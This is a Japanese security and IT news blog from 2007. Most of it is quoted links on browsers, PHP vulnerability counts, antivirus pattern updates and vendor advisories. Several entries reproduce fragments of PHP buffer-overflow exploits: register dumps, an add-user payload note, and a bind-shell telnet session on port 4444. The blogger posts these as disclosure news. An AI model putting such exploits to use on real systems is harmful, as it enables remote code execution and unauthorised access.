「○○ブラウザは軽いよね」とか「××ブラウザは動作が重い」とか、Webブラウザの悩みは尽きない。Internet ExplorerIE)7を使っている筆者も、「あまりタブを開きすぎると、動作が遅くなるのではないか」という懸念から、開いたタブをいちいち閉じたりしていた。

 タブを開くと一体どれくらいのメモリを食うのか──。メモリの使用量と動作の軽い、重いは必ずしも関連しないが、何らかの指標になるかもしれない。さっそく実験してみた。

ってことで、子育て情報発信所さんのところでは、FireFoxInternetExplorer7Operaの順だったみたいです。

まずIE7だ。起動前は509Mバイトだったが、直後は526Mバイトと17Mバイト増加。30ページ開くと656Mバイトになった。起動直後に比べて 130Mバイトの増加。1ページあたり約4.33Mバイトとなる計算だ。起動前と比較すると、147Mバイトの増加となっている。

 続いて、セーフモードFirefox。起動前は510Mバイトだったが、直後は528Mバイトと18Mバイト増加。ここまではIE7と同水準だ。30 ページを開くと593Mバイトなので、起動直後と比較すると65Mバイトの増加。起動前と比較して83Mバイトの増加にとどまった。1ページあたり約 2.17Mバイトで、IE7と比べると約半分の使用量だった。

 最後にOpera 9.20。起動前は512Mバイトだったが、起動直後は543Mバイトに増加。すでに31MバイトIE7Firefoxと比較しても最もメモリ使用量が多いようだ。続いて、30ページを開いてみると632Mバイトに達した。起動直後と比較すると89Mバイト、起動前からは120Mバイトの増加。1ページにつき約2.97Mバイトとなった。IE7よりは少ないが、Firefoxよりはメモリの使用量が多かった──というわけだ。


[]黒葛原 寛のWebマネジメント講座 - 第13回 グローバルなサイトマネジメント <コンセプトや理念をどのように伝え、共有し、かたちにしていくのか>:ITpro

グローバル企業でのWebサイトの管理方法について。

体制づくり

まず、ガイドライン発行元と各国各地との連絡体制(コミュニケーションパス)を構築しなければならない。

たとえば次のような考え方も一般的である。

すべての国に窓口が必要になるが、それらすべてとコミュニケーションするというのも、非効率なため、国を一定の地域(リージョン)にグルーピングし、まずはリージョン単位でのパスを構築する。北米中南米ヨーロッパ‥‥、などという括り方だ。

最終的にはコミュニケーション。情報流通が必要ってこと。

たとえば、定期的な情報連絡会やリージョンミーティングも効果的である。

どこもコミュニケーションが大切というのは一緒ですが、欧米系はFace to Faceが重要視されるってことか。

遠くからわざわざありがとう!!!!握手!!!ってのが、大切って感じかな。なんとなくわかる。

その際の、情報の伝え方だが、今までの経験から、直接会って話したほうが良い。e-mailやテレビ会議が普及した今日、意外かもしれないが、コンセプトや考え方を正確に理解してもらうには、直接会って伝えたほうが格段に効率がよかった。他のメディアを使っての情報伝達も不可能ではないが、結果的に早いし、効率的であった。e-mailだけでは人は動かない。

 さらに、外国の方特に欧米系の方々は、一般的に顔の見えないコミュニケーションに不安を感じるようだ。表情やさらには人柄、熱意、握手の感触など人間的な要素すべてをつかって伝達できるのは、直接会ってのコミュニケーションならではの利点である。ネットワーク時代のコミュニケーションだがやはり人と人というプリミティブなコミュニケーションの原点ははずせないようだ。


[]日本中ののぼりを「カレーライス」にしようw - ikepyonのお気楽な日々〜技術ネタ風味〜

生真面目やなぁw

ちと、ネタで書いたことに、まっちゃさんに変な誤解を与えたようなので、調べてみる。

データの元はhttp://nvd.nist.gov/を使う。このサイトが何かはがんばって読んでみてw

で、ここで、PHP自身の脆弱性の数を調べてみる。

PHP言語脆弱性

Year20072006200520042003200220012000
# of Vulns8235176111242
% of Total2%1%0%0%1%1%0%0%

今年発見された脆弱性が妙に多いのは、MOPBで公開されたためだろう。

てか、Tomcatも少ないねぇ。

Tomcat脆弱性

Year2007200620052003200220012000
# of Vulns 14 1 6 7 11 4 3
% of Total 0% 0% 0% 1% 1% 0% 0%

2007年は特殊なので除外するとしてそれ以外を見ると、確かにPHPは総数は多いけど、PHPが特別にひどいというわけではないのはないんじゃないかなぁ?

母数が違うと脆弱性のパーセンテージも変わってくるんでしょうけど、それにしても多いですよね。

PHPだけ、、、っていうと少ないのかな?言語としてのPHPPHPを使うソフトとしての脆弱性2側面あるよね。
これは、PHPを使うソフト脆弱性をとってますよね?

で、本当はPHPアプリ脆弱性の数とJavaアプリ脆弱性の数を比較してみたかったんだが、統計取るのが面倒そうなので、ちょっと割愛。そのうち取ってみるかも。

結論:PHP言語自体には問題があるかもしれないけど、OSとかWebサーバとかと比べてみても、PHP自体が特別危険というわけではないかも。

あと非オープンソースオープンソースでは比較にならない気がする・・・こんなの比較しそうなのは、id:into_the_blueタンくらいw


[][]パターンアップ-4.671.00

Trendmicroのパターンがアップしました。

パターン番号:4.671.00

イエローアラート:なし
アップデート理由:BKDR_IRCBOT.AJZ緊急亜種対応
新規対応
 なし
亜種対応
 緊急対応
  BKDR_IRCBOT.AJZ


[]忘れてた

無事セバスチャンとはぐはぐできました(何)


[]Sun,NASDAQの証券コードを「JAVA」に変更:ITpro

SUNWからJAVAに証券コードを変えるそうです!!!

Sun Microsystemsは,NASDAQ株式市場における同社株のティッカー・シンボル(証券コード)を,従来の「SUNW」から「JAVA」に変更する。同社が米国時間8月23日に発表したもの。新たなティッカー・シンボルは8月27日の取引より使用する。

ってことで、Javaって結構使われてるよね・・・って話。

Googleや米eBayのほか,大手金融企業や通信企業などが取り入れており,21億台以上のモバイルデバイスインターネット接続しているほぼすべてのパソコン,多数の民生電子機器や組み込みシステムで採用されているという。


[]じゃば開発者の独り言 - PHP

「Month of PHP Bugs」から考察するPHPのセキュリティ問題と課題ブックマークにも書いたが、この資料を見てPHPが危険と報告して欲しくない。

PHP陣営も鋭意意識を変えていますし、専有PHPサーバーであればほぼ影響が無かったりします。
単純にPHP=危険という考えは間違えていると思います。
同様にJavaに同じプログラムミスはないの?Perlは?ってのもありますよね。

ikepyon 『IPAの偉い人も「例えば、PHPを避ける」とおっしゃっているので、避けるべきですよw(違』

iwmt 『これを理由に使えば受けずに済むかなwww』

ripjyr 『Yes○○キュア5!!!』

ripjyr 『あの勉強会の資料のはてぶで、書いてありますが

     あれで、PHPをUnSecureと思わないで欲しいと記載しています。

     ですので、危ないと思わないでくださいねー』


[][]パターンアップ-4.669.00

Trendmicroのパターンがアップしました。

パターン番号:4.669.00

イエローアラート:なし
アップデート理由:定期アップデート
新規対応
 特筆なし
亜種対応
 特筆なし


[].NETの社内展開、管理の実際1.マイクロソフトはいかに.NETを活用しているのか マイクロソフト社のシステム管理者に聞く − @IT

34万台・・・すげぇーーそりゃ効率化を考えて製品が出るわけだ

マイクロソフトの社内システム環境について

荒瀬:全世界では、34万台のクライアントPCがあり、6500〜8000台のサーバがあります。ここでいうサーバは、主に社内での業務に使われるもので、外部向けにサービスを提供するサーバ群とは別です。ユーザー数は約11万人ですので、単純計算では1人平均3台のクライアントPCを持っているということになります。

やっぱり大規模だw

荒瀬:社内で使用されている業務アプリケーション全体では、全世界で約1000種類くらいあるでしょう。Excelマクロのようなものを含めると、2500とか3000種類はあるという説もあります。

やっぱり、適材適所。Excelで十分なものはExcelで、InfoPathくらいのインターフェースが必要なものはInfopath、.NETが必要なものは.NETってことか・・・

ここで今回の本題に入るのですが、それらのうち.NETアプリケーションの数は多いのでしょうか?

荒瀬:総数はまだそれほど多くはありません。参照系のアプリケーションでは、.NET以前から使われていたWebアプリケーションブラウザベースで使用しています。ExcelVBAマクロの組み合わせで十分なものもけっこうあります。またクライアント側で入力系を処理する場合でも、最近はOffice製品のInfoPathをフロントエンドとして利用したものが増えています。

Microsoftという会社的に、全ユーザパソコンの管理者権限をもっているそうです。インストールはOKみたいですね。

ただし不必要なソフトは、ブラックリストで検知はしているみたいです。

荒瀬:ごく一部を除き、基本的にユーザーには管理者権限を与えています。必要なアプリケーションはどんどんインストールして仕事してください、と。例えば、必要ならばサードパーティソフトウェアを買ってきて、インストールして使ってよいということになっています。ただし、全社的なポリシーとして、P2Pソフトウェアなど、使用が禁止されているものもあります。これらについては、SMS(Systems Management Server)で定期的にチェックして、禁止されているソフトウェアが見つかれば、忠告してアンインストールしてもらっています。

猶予期間は48時間。それ以降ネットワークから切断・・・一部NAPも使ってるみたいですね

更新プログラムが公開された時点で、緊急度に応じて、例えばこの更新プログラムは48時間以内に適用すること、などの猶予期間を設けてその期間に自分で適用してもらいます。その後、ITグループがSMSを使って全クライアントに対して、更新プログラムが適用されているかどうかチェックします。適用されていないクライアントがあった場合は、名前をピックアップし、スイッチング・ハブの設定を変更して、そのクライアントのネットワークの接続を閉じるという作業を行います。つまり、そのクライアントは、社内ネットワークにアクセスできなくなります。


[]asahi.com:Xboxの別売りコントローラーに不具合 発煙の恐れ - 社会:

Xbox360のハンドルコントローラーに発煙の恐れがあるそうです!!!!

ACアダプタで接続した場合発熱や発煙の可能性があるそうです。

マイクロソフト日本法人は23日、ゲーム機「Xbox360」のレーシングゲームなどに使う別売りのハンドル型コントローラーに発熱、発煙の恐れがあると発表した。不具合が生じるのは現在、AC電源アダプターを使って遊んだ時に限られているといい、同社は乾電池などでの利用を呼びかけている。

関連URL


[]PHP 5.2.3 php_ntuser ntuser_getuserlist() Local Buffer Overflow PoC:

PHP 5.2.3のphp_ntuserでローカルバッファオーバフローするPoCが出ています。

<?php
//PHP 5.2.3 php_ntuser ntuser_getuserlist() Local Buffer Overflow
//author: shinnai
//mail: shinnai[at]autistici[dot]org
//site: http://shinnai.altervista.org

//greetz to BrainBugger Crew
//http://www.brainbugger.altervista.org/

//Bug discovered with "Footzo" (thanks to rgod) modified.

//To download Footzo:
//original link: http://godr.altervista.org/index.php?mod=Download/useful_tools#footzo.rar
//alternative: http://www.shinnai.altervista.org/index.php?mod=Download/Utilities#footzo.rar

//also theese are vulnerable:
//ntuser_getusergroups <-- DoS, we control EAX
//ntuser_getdomaincontroller <-- DoS, we control EAX
//ntuser_getuserinfo <-- BoF, we control EIP 00410041

//This is the content of registers:

//EAX FFFFFFFE
//ECX 00000754
//EDX 00000041
//EBX 00223D18
//ESP 00C0FB34 UNICODE "CCC... x 100"
//EBP 00C0FBD0 UNICODE "CCC + DDD... x 100"
//ESI 011AC4A8
//EDI 011ADC00
//EIP 00410041


[]フィールドSEあがりの安納です : お礼:TechEd T2-306 セション 「管理者不足とセキュリティに悩む〜」をご覧いただいた皆様へ:

みんな聞きに行っていた安納さんのRODCのテクニカルセッション、楽しかったみたいですねぇ。

1)無人インストール用セットアップファイルについて

本件に関しては、詳細な情報を以下に掲載してありますのでご覧ください。

http://blogs.technet.com/junichia/archive/2007/08/22/Windows_5F00_Server_5F00_2008_5F00_RODC_5F00_2stage_5F00_unattend.aspx

2)ドメインサービス停止による Authoritative Restore について

セッション中、「これは私のはやとちりでした」と申し上げてバツにしていただきましたが、今後継続して調査し、ここでご報告します。

3)RODCインストール前の準備について

2003で構築したDC混在時には以下のコマンドを入力

adprep /forestprep

adprep /domainprep

RODCをインストールする場合で、かつAD統合DNSを使用している場合には以下のコマンドを入力

adprep /rodcprep

4)エバンジェリストによるセミナー

エバンジェリストによるセミナーは以下のサイトをご参照ください

IT Pro 向け(TechNet

http://www.microsoft.com/japan/technet/community/events/

■Dev向け(MSDN

http://www.microsoft.com/japan/msdn/skillup/

DCの場合同期が必須だから、回線とかの確保も必要なのか>ExchangeMVPの岩佐さんのコメントより

中国の場合、時間帯によって帯域がものすごく変わるため、DC間の同期がすぐにおかしくなってしまい、セットアップから数ヶ月も経つと、東京で追加したユーザが拠点のDCに反映されるのに数日かかるような状態になってました。

こうなるとですね、そんなDCは百害あって一理なしなんですよね。そういう訳で現在ウチの拠点にはDCは存在していません。

RODCってことで期待はしているんですが「リードオンリー」という割には、バックグラウンドで結構複雑なことをやっているんだなということがわかりました。

ふむふむ。RODCって使用用途がまだ想像できないのですが、、、小さなブランチに使うのもBetterですか。。。

話は変わりまして、これは個人的な意見で恐縮なのですが、書き込み可能なDCにも、「認証履歴リスト」があるといいなぁと思っています。ただ...何千人も認証するような環境だとリストが膨大になってしまって、DC間の複製にも負荷をかけてしまいますから、現実的じゃないのかなぁとも。そういう意味では、 RODC は、やはり大規模なサイトに向けたソリューションではなく、少人数のブランチ向けなのだろうと思っています。


[]フィールドSEあがりの安納です : Windows Server 2008:一度使った無人セットアップファイルはパスワードがクリアされる:

無人セットアップファイルは、一度使うとパスワード欄がクリアされるそうです。

再度設定すればOKだそうです。うん、確かに。でも面倒w

無人セットアップファイルは、一度使用すると、パスワードがクリアされてしまいます。

そのため、再度実行する場合には、再度パスワード部分を埋めてあげる必要があります。

以下に、使用前と使用後の無人セットアップファイルを掲載しておきます。

Password と SafeModeAdminPassword の値がクリアされていることがわかります。


[]今年もやります! ネットワーク管理者の実力試し「ネットワーク検定」:ITpro:

日経NETWORKが、ネットワーク管理者のスキル診断ネットワーク検定を開催するそうです。

自分のネットワーク知識の棚卸しのためにもどうでしょうか?

日経NETWORKでは,昨年はじめてネットワーク管理者のスキルを診断する検定試験「ネットワーク検定」を実施した。Webで30問の問題を出題し,解いていただいた方にメールで採点結果をお知らせするイベントである。おかげ様でご好評いただき,今年も「ネットワーク検定2007」として実施する運びとなった。

今年の参加ももちろん無料。すべての参加者には,9月中旬にメールにて得点をお知らせする。メールでは,自分の順位,平均点,ジャンル別の得点,問題ごとの正答率などを併せてお知らせするので,自分の「位置」や「苦手・得意ジャンル」などがわかるようになっている。


[] 生年月日から年齢を計算する簡単な計算式(ykatoの日記 - 巡回先からいろいろ引っ張ってくる blog と雑感とか:)

へぇーーーこんな感じででるんですか・・・!Excelとかでも簡単だ!

最近知ったんですが、生年月日から年齢を計算する簡単な計算式というのがあるそうです。

(今日の日付-誕生日)/10000の小数点以下切捨て。

関連URL


[]Open Tech Press | 富士通SSL、オープンソースのシステム監視ソフトで金融系会社のシステム構築:

GroundWork Monitorですか、GUIでいじれるのはうれしいなぁ。

「GroundWork Monitor」は米GroundWork Open Source社が、オープンソースのシステム監視運用ツール「Nagios」をベースに、トラフィック分析ツール「Cacti」やネットワーク検出ツール「NeDi」などのオープンソースツールを組み合わせたソリューション。GUI操作できることなどが特徴。

関連URL


[]XP搭載パソコンの生産は2008年1月31日まで:日経パソコンオンライン:

ついにXPパソコン2008年1月31日に終了です。

これ以降は、Vistaモデルってことですね。ダウングレード権はあるので、自分でやってね、ベースってことです。

マイクロソフトは2007年8月22日、Windows XPの正規OEMライセンスのパソコンメーカーなどへの提供を、2008年1月31日に終了すると改めて発表した。これと同時に、パソコンメーカー各社によるWindows XP搭載パソコンの生産も終了する。

Windows XPのOEMライセンス提供が、Windows Vista発売後1年間継続されることは従来から明らかにされていた。提供終了による混乱を避けるため、今回改めて発表された形だ。


ikepyonikepyon 2007/08/24 16:04 実際に、PHPとJavaとPerlについて調べてみました。結果は一目瞭然だったorz
本当にやりたかったことはちょっと片手までは出来ないので、アレなんですが・・・

ikepyonikepyon 2007/08/25 19:59 もともと、PHPで作られたアプリとJava等で作られたアプリの脆弱性の違いを調べたかったんですが、言語単体の脆弱性だったら簡単だったので、ついでに出してみただけですw

2007年08月23日(木曜日) 処暑:白虎隊の日

[]PHP <= 5.2.3 (php_win32sti) Local Buffer Overflow Exploit (2)

2つ目のPHP Win32Stdの脆弱性を攻撃コードです。

##########################################################
###----------------------------------------------------###
###--------PHP win32std Buffer Overflow Exploit--------###
###----------------------------------------------------###
###-Tested on:-PHP 5.2.3-------------------------------###
###------------Windows XP SP2 Eng----------------------###
###----------------------------------------------------###
###-Note:-Shellcode is hard coded for Win XP SP2 Eng---###
###----------------------------------------------------###
###-Author:--NetJackal---------------------------------###
###-Email:---nima_501[at]yahoo[dot]com-----------------###
###-Website:-http://netjackal.by.ru--------------------###
###----------------------------------------------------###
##########################################################



#Add user:    [user]=>"adm1n" [password]=>"netjackal"


[][]ServerProtect for Windows/NetWare 5.58 用 Security Patch 2(Build_1185)適用のお願い

Server Protect 5.58の攻撃スキャンが始まっているそうです!!!早急にパッチを適用しましょう

2007年8月23日現在、TCP 5168 番ポートへのスキャンが増加していることが確認されております。

このポートは、ServerProtectがコミュニケーションポートとして使用しております。

このポートスキャンは、以下のSecurity Patchにて既に対応しているServerProtectの脆弱性を保持するコンピュータスキャンしている可能性がございます。

現時点(2007年8月23日)まで、この脆弱性を悪用した被害報告はございませんが、ServerProtectをご使用のお客さまにおかれましては、早急に以下のSecurity Patchを適用していただくようお願い致します。


[]安定性向上、超高速HTTPアクセラレータ最新版”Varnish 1.1.1” | エンタープライズ | マイコミジャーナル

ってことで、Varnishの新バージョン出たそうです。

VarnishはC言語で開発されたHTTPアクセラレータFreeBSD 6およびLinux 2.6をメインプラットフォームとして開発されたプロダクトで、仮想メモリシステムやI/O機能など、OSの提供している機能をフルに活用することでプロキシよりも高速に動作するという特徴がある。既存のWebシステムにあまり手を加えることなくても、Varnishを導入して高速化が実現できるという利点もある。


[]Multiple Vulnerabilities in Trend Micro Products(US-CERT Current Activity:)

ServerProtectに複数のDoSを誘発する脆弱性が存在してパッチをリリースしたそうです。

Trend Micro has released updates to address several vulnerabilities in their ServerProtect, AntiSpyware, and PC-cillin Internet Security products. By sending a crafted RPC request or creating a file on the local file system with an overly long path, an attacker may be able to cause a denial-of-service condition or execute arbitrary code on an affected system.

関連URL


[]弟子のMicrosoft MVPとしてのデビュー記事(802.11セキュリティ - 徒然なるままに・・・)

すたっきーがMVPになりました!!!おめでとーーー!

コミュニティは力なり: by 滝崎芳枝氏(Microsoft MVP for Windows Security July, 2007-June, 2008)

ちなみにびっくりですよ!

ちなみに、28 号で書かれていた「IDS を開発していた女子高生」とは私のことです。女子高生が IDS ってびっくりされましたか? 女子大生が無線…でもびっくりなのでしょうか・・・。

メーカーを固定できるほどの文章w。NintendoDSのおかげでこういうことになってるんですよね。ほんまに。

早くパッチでないものか・・・

アンケートの質問項目には「WEP は何分で解読できると思いますか?」という質問を入れておきました。回答者の半数以上が、5 分以内で解読できるという回答をしていました。またその 9 割は無線 LAN アクセスポイントの自動設定機能を使わずに、手動で設定していることも分かりました。この 2 つの項目より、回答者が比較的セキュリティに対する意識が高い人たちだと言うことが推測できます。それにも関わらず、「どのような暗号方式を採用していますか?」という質問に対しては、約 4 割が WEP による暗号化を使っていると回答しました。WEP を使っているのは何故かと言う質問項目に対しては、無線 LAN接続しているゲーム機などが WEP にしか対応していないので仕方なく WEP を使っているという意見が出てきました。


[]PHP <= 5.2.3 (php_win32sti) Local Buffer Overflow Exploit

PHPWin32において、シェルをオープンできる脆弱性が存在するそうです。

/*
Inphex
317 Bytes , Windows Command Shell  Bind TCP Inline , Architecture x86 , Windows TinyXP - vm.
GET /script.php HTTP/1.1\n

telnet 192.168.2.32 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\apache>
7ffdf020  7c911005 7c9110ed 00000001 00000000

shoutz go to Kevin Finisterre
*/


[]【第5回】 翻訳書でライターデビュー:矢沢久雄のソフトウエア芸人の部屋:ITpro:

翻訳本は一回お手伝いしてみたいですねぇ。XSS本でも訳しますか?>誰となく

短時間に翻訳する秘策をお教えします

  • まず、原書を章ごとに切って持ち運びやすいようにし、現在翻訳している章と英和辞典をカバンに入れて持ち歩きました。移動中の電車の中や打ち合せの待ち時間など、少しでも時間があれば、わからない単語を英和辞典で調べ、意味を書き込みました。電車の中で立っているときも、この作業をしました。
  • 少しでも時間があればノート日本語訳を書きました。このときは、美しい日本語にしようなどど考えず、いわゆる直訳です。
  • 最後に、ノートの内容を美しい日本語に修正しながら、ワープロに打ち込みました。


[]SecuriTeam”! - Trend Micro SSAPI Long Path Buffer Overflow Vulnerability:

ウイルスバスター2007のvstlib32.dllに長いパス脆弱性って、例のやつの詳細ですね。

PC-Cillin Internet Security 2007 vstlib32.dll version 1.2.0.1012

Trend Micro products which include the VST functionality are vulnerable to a stack-based buffer overflow in the vstlib32.dll library. This overflow is triggered when an attacker creates a file on the local file system with an overly long path. When vstlib32 receives the ReadDirectoryChangesW callback notification from the Operating System, a stack based buffer overflow will occur.


[]ServerProtect for Linux 2.5 用 Patch 3 公開のお知らせ

以下のリンクに修正内容が書かれていますが、不具合から

Trend Micro ServerProtect for Linux 2.5 Patch 3が出ています。これは、上記で書かれているServerProtectのパッチみたいです。

2. 修正される内容
=================
本Patchでは、次の問題が修正されます。

   2.1 修正される既知の問題
   ========================
   a. KHM (カーネルフックモジュール) をサポートするため、ServerProtectからRed 
      Hat Enterprise Linux 4 hugememカーネルに対して余分な引数が要求される問題
   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      本Patchの適用後は、ServerProtectに付加的な引数が追加され、ServerProtectが
      Red Hat Enterprise Linux 4 hugememカーネルをサポートできるようになりま
      す。

   b. プロキシ設定画面のユーザIDまたはパスワードにバックスラッシュ「\」が含まれ
      ている場合、プロキシ認証が失敗する問題

      ServerProtectでバックスラッシュ「\」が特殊文字として扱われることにより、
      ユーザIDまたはパスワードが不正なものに変化してしまいプロキシ認証が
      正常に実行できませんでした。
   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      本Patchの適用後は、ユーザIDまたはパスワードにバックスラッシュが含まれる
      場合でも、ServerProtectのサポートするすべてのプラットフォームで正常にプロ
      キシ認証が行われるようになります。

   c. ServerProtectの一部のメール通知で、日付が正しく表示されない問題
   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      本Patchを適用することにより、メール通知の日付が正常に表示されるようになり
      ます。

   d. 特定の条件下で、ServerProtectのログが正常に表示されなくなる問題
   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      ログの表示画面が空白になったり、不正なログ数が表示される場合があります。
      本Patchの適用後はこの問題が修正され、ログが正常に表示されるようになりま
      す。

   e. 夏時間が有効になっているとき、ServerProtectのログが正常に表示されなくなる
      問題
   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      タイムゾーンで夏時間が有効になっているとき、ログの表示画面が空白になった
      り、23:00:00から23:59:59の間に生成されたログ数が誤って表示される場合が
      ありました。
      本Patchの適用後はこの問題が修正され、ログが正常に表示されるようになりま
      す。

   f. ServerProtect for Linuxの使用するOpenSSLの脆弱性の問題

      この脆弱性により、リモート攻撃を受けるおそれがありました。
      この問題ついての詳細は、Common Vulnerabilities and Exposuresプロジェクト
      によりCVE-2006-4339として発表されています。
   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      本Patchは、最新のモジュールmod_ssl-2.8.28-1.3.37およびopenssl-0.9.8dを
      含むリパックされたApache (ビルド 1.3.37) により構成されています。

      本Patchの適用により、OpenSSLの脆弱性の問題およびTrend Micro Control 
      Manager (以下、Control Manager) エージェントlibssl.so.0.9.6、
      libcrypto.so.0.9.6が修正されます。

   g. ServerProtectの管理コンソールにおける認証チェックルーチンの脆弱性の問題

      ServerProtect管理コンソールで認証に成功するとCookie「splx_2376_info」が
      発行されますが、このCookieによる認証チェックルーチンの脆弱性を利用し、
      悪意のあるユーザが内部ページのフルアクセス権を取得することが可能です。

      この脆弱性を利用することにより、サーバコンピュータのウイルス対策機能を
      変更および無効化するリモート攻撃が可能になります。
   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      本Patchの適用後は、Cookieのname-valueペアがランダムに生成され、
      認証されたユーザ以外の管理コンソールへのフルアクセス権の取得を防ぎます。
      また、HTTP経由でのログオン画面は無効となり、すべてのHTTP接続はHTTPSにリダ
      イレクトされます。


[]JPCERT/CC、注意喚起や緊急報告のRSS配信開始:

JPCERT/CCが注意喚起をRSSで配信するそうです。こりゃいいや。

JPCERT/CC RSSは、「JPCERT/CC RDF Site Summary」の略で、JPCERT/CCに掲載されている注意喚起や緊急報告などの見出しとURLを通知するためのXMLフォーマット。RSSバージョン 1.0に準拠する。


[]【レポート】Microsoft Tech・Ed 2007開幕 (1) マイクロソフトにおける日本市場の位置づけ | エンタープライズ | マイコミジャーナル:

Windows Server2008とSQL Server2008、VisualStudio2008がメインって感じですね。

また、具体的な製品として、リリースを控えた"SQL Server 2008""Windows Server 2008""Visual Studio 2008"の3製品に言及した。今回のTech・Edでは、この3製品に関する情報提供が中核となる。


[][]パターンアップ-4.667.00

Trendmicroのパターンがアップしました。

パターン番号:4.667.00

イエローアラート:なし
アップデート理由:定期アップデート
新規対応
 特筆なし
亜種対応
 特筆なし


ikepyonikepyon 2007/08/23 18:04 翻訳プロジェクト立ち消えになっちゃってごめんなさいm(_ _)m

2007年08月22日(水曜日) チンチン電車の日

ripjyr2007-08-22

[][]パターンアップ-4.665.00

Trendmicroのパターンがアップしました。

パターン番号:4.665.00

イエローアラート:なし
アップデート理由:定期アップデート
新規対応
 特筆なし
亜種対応
 特筆なし


[][]ServerProtect for Windows/NetWare 5.58 用 Security Patch 2(Build_1185)公開のお知らせ

Server ProtectのRPCに関するもムールのバッファオーバフローの脆弱性によってリモートからシステムアカウントを取得できるそうです。

パッチが出ていますので適用しましょう。

ServerProtectの一部のモジュールにおけるバッファオーバフロー脆弱性の問題

ServerProtectのモジュール(AgRpcCln.dll)にRPC通信を利用してリモートから

不正にアクセスすることが可能なバッファオーバーフロー脆弱性があります。

この脆弱性を利用して、リモートからSystemアカウントで悪意のあるコードを

実行される危険性があります。

関連URL

海外ってPatch4だけど日本はPatch2なんですねw。結局はBuild番号でみればよいのでどっちでもいいんですけどw


[]Cisco IP Phone 7940 SIP Message Sequence Denial of Service - Advisories - Secunia:

CiscoIP電話IP Phone 7940で脆弱性が存在するそうです。SIPメッセージシーケンスの処理に問題があるそうです。

The Madynes research team at INRIA Lorraine has reported some vulnerabilities in Cisco IP Phone 7940, which can be exploited by malicious people to cause a DoS (Denial of Service).

The vulnerabilities are caused due to errors within the handling of certain SIP message sequences. These can be exploited to reboot the device by sending a series of specially crafted SIP messages.


[]EMC NetWorker Remote Exec Service Buffer Overflow - Advisories - Secunia:

EMCのNetworkerでRemote Execサービススタックベースバッファオーバーフロー脆弱性が存在するそうです。

A vulnerability has been reported in EMC NetWorker, which can be exploited by malicious people to compromise a vulnerable system.

The vulnerability is caused due to a boundary error within the Networker Remote Exec Service (nsrexecd.exe). This can be exploited to cause a stack-based buffer overflow by sending a poll or kill request with an overly long, invalid subcmd to the service, which is available via a query to the portmapper on port 111/TCP for service #0x5f3e1, version 1.


[]ウェブルート、スパイウェア検出とウィルス対策がセットになった法人向けセキュリティソフト:Enterprise:RBB TODAY (ブロードバンド情報サイト) 2007/08/21:

パイウエア対策とウイルス対策をWebrootが出したそうです。結構安いですね。

ウェブルート・ソフトウェアは21日、スパイウェア対策とウイルス対策機能を備えた企業向けセキュリティ対策ソリューション「Webroot AntiSpyware Corporate Edition with AntiVirus」を発表した。100ユーザの場合の1ユーザあたりの参考価格は、スパイウェア対策機能のみが2,646円、ウイルス対策機能付きが 4,011円。

Sophosを含めているそうです???うん?ウイルスの進入検知や挙動検知にSophosを使ってるってことかな。(振る舞い検知?)

Webroot AntiSpyware Corporate Edition with AntiVirusは、コードの実行前にウイルスの挙動を分析するソフォスのホスト侵入防止システム(HIPS)「Behavioral Genotype Protection」によるマルウェア対策機能のほか、トレース、リアルタイム脅威レポート、更新検疫レポート、トレース詳細レポート、シングルスパイレポートシールドイベントレポートなどの強力なレポート機能によりスパイウェア検出機能が強化されている。


[]情報処理推進機構:セキュリティセンター:セキュリティ関連NIST文書

電子認証のガイドラインらしいです。

SP 800-63SP 800-64(2006年04月)電子的認証に関するガイドライン(Electronic Authentication Guideline)2007年8月


2007年08月21日(火曜日) 献血記念日

ripjyr2007-08-21

[]First exploit appears for Patch Tuesday vulnerability:

IE6の脆弱性MS07-042)のExploitについて出たという内容。てか、おとといくらいに出てたなぁ。

In a posting to the Full Disclosures security mailing list, Alla Bezroutchko, a senior security engineer at Brussels-based Scanit NV/SA, spelled out JavaScript code that crashes Internet Explorer 6.0 on Windows 2000 and Windows XP Service Pack 2. Bezroutchko's proof of concept exploits the critical bug in XML Core Services that was patched by MS07-042.


[]人を育てられない人:油野達也の「達」観主義:ITpro:

人を育てるのは、本当に難しい・・・エンジニアとして成功した人がPMにはなれないよね・・・・・

つまり部下を育てるということは大変高度なプロジェクト管理能力が必要ということだ。

優秀なエンジニア≠優秀なPMと同じことで、これは明らかに担当者としての能力とは別のそれだろう。

では優秀な担当でなくて良いのか? それは否だ。

知り尽くした仕事じゃないと先に書いた「トラブルの可能性を織り込ん」だりできない。

これはずば抜けた経験が必要だということでもある。


[]ITmedia エンタープライズ:「Skype障害と月例パッチは無関係」、MSが強調:

SkypeWindowsUpdateのリブートで接続できない障害があった件、Microsoftは特に問題なくて関係ないとの見解だそうです。

Skypeは今回の障害について、「Windows Updateを通じて定例パッチを受け取った後、短時間の間に世界中の多数のユーザーが自分のマシンをリブートしたことが障害の引き金になった」とサイトで説明。これを受けて、Microsoftには顧客からの問い合わせが相次いだという。

しかし「今月のパッチリースに普段と違うことは何もなかった」とMicrosoftは強調。「Skypeが説明している通り、問題はSkypeソフトバグにあり、14日のアップデートとは関係ない」と述べている。


[][]パターンアップ-4.663.00

Trendmicroのパターンがアップしました。

パターン番号:4.663.00

イエローアラート:なし
アップデート理由:定期アップデート
新規対応
 特筆なし
亜種対応
 特筆なし


[]Oracle Forensics and Incident Response - databasesecurity.com

(kikuz0uさん経由)

Oracleはよく使っているのでメモ

やっぱりORACLE_HOMEは大切ですよね。

いろいろ見てもおもしろいプレゼン資料ですねぇ。プレゼンも是非聞きたいですねぇ。


[]「ウイルスバスター2007」のセキュリティパッチが公開

